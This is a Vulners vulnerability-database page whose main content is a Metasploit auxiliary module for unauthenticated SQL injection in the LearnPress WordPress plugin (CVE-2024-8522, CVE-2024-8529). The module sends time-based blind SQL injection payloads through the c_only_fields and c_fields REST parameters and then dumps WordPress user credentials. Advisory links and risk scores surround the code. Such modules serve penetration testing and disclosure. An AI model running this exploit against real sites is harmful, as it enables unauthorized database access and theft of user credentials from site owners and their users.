Vulners
Lucene search
WordPress LearnPress Unauthenticated SQLi (CVE-2024-8522, CVE-2024-8529)
ποΈΒ 17 Oct 2024Β 18:54:23Reported byΒ abrahack, Valentin Lobstein, Achref Ben Thameur a.k.a achrefthameurTypeΒ 
Β metasploitπΒ www.rapid7.comπΒ 463Β Views
| Reporter | Title | Published | Views | Family All 35 |
|---|---|---|---|---|
 | WordPress LMS 4.2.7 SQL Injection Vulnerability | 23 Sep 202400:00 | β | zdt |
 | Exploit for SQL Injection in Thimpress Learnpress | 19 Sep 202407:04 | β | githubexploit |
| Exploit for SQL Injection in Thimpress Learnpress | 12 Oct 202420:52 | β | githubexploit |
 | The vulnerability of the βc_only_fieldsβ parameter in the REST API endpoint /wp-json/learnpress/v1/courses of the LearnPress plugin for the WordPress content management system allows a hacker to execute arbitrary SQL code. | 18 Feb 202500:00 | β | bdu_fstec |
 | CVE-2024-8522 | 12 Sep 202410:08 | β | circl |
| CVE-2024-8529 | 12 Sep 202411:51 | β | circl |
 | WordPress plugin LearnPress SQL注ε ₯ζΌζ΄ | 12 Sep 202400:00 | β | cnnvd |
| WordPress plugin LearnPress SQL注ε ₯ζΌζ΄ | 12 Sep 202400:00 | β | cnnvd |
 | CVE-2024-8522 | 12 Sep 202408:30 | β | cve |
| CVE-2024-8529 | 12 Sep 202408:30 | β | cve |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::Remote::HTTP::Wordpress::SQLi
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress LearnPress Unauthenticated SQLi (CVE-2024-8522, CVE-2024-8529)',
'Description' => %q{
The LearnPress WordPress LMS Plugin up to version 4.2.7 is vulnerable to SQL injection via
the 'c_only_fields' and 'c_fields' parameters. This allows unauthenticated attackers to exploit blind SQL injections
and extract sensitive information.
},
'Author' => [
'abrahack', # Vulnerability Discovery
'Valentin Lobstein', # Metasploit Module
'Achref Ben Thameur a.k.a achrefthameur' # Help for CVE-2024-8529 reproduction
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-8522'],
['EDB', '52171'],
['CVE', '2024-8529'],
['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-427-unauthenticated-sql-injection-via-c-only-fields'],
['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-427-unauthenticated-sql-injection-via-c-fields']
],
'Actions' => [
['CVE-2024-8522', { 'Description' => 'SQL Injection via c_only_fields parameter' }],
['CVE-2024-8529', { 'Description' => 'SQL Injection via c_fields parameter' }]
],
'DefaultAction' => 'CVE-2024-8522',
'DefaultOptions' => { 'SqliDelay' => '2', 'VERBOSE' => true },
'DisclosureDate' => '2024-09-11',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
register_options [
OptInt.new('COUNT', [false, 'Number of rows to retrieve', 1]),
]
end
def run_host(_ip)
if action.name.downcase.include?('cve-2024-8529')
sqli_param = 'c_fields'
description = 'CVE-2024-8529'
path = '/wp-json/lp/v1/courses/archive-course'
additional_params = { 'return_type' => 'json' }
else
sqli_param = 'c_only_fields'
description = 'CVE-2024-8522'
path = '/learnpress/v1/courses'
additional_params = {}
end
print_status("Performing SQL injection for #{description} via the '#{sqli_param}' parameter...")
@sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
random_negative_number = -Rex::Text.rand_text_numeric(2).to_i
vars_get = { sqli_param => "IF(COUNT(*)!=#{random_negative_number},(#{payload}),0)" }.merge(additional_params)
vars_get['rest_route'] = path if action.name.downcase.include?('cve-2024-8522')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, path),
'vars_get' => vars_get
})
fail_with(Failure::Unreachable, 'Connection failed') unless res
end
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') unless @sqli.test_vulnerable
print_good('Target is vulnerable to SQLi!')
wordpress_sqli_initialize(@sqli)
wordpress_sqli_get_users_credentials(datastore['COUNT'])
end
end
Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jun 2026 19:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.17.5 - 10
EPSS0.61355
SSVC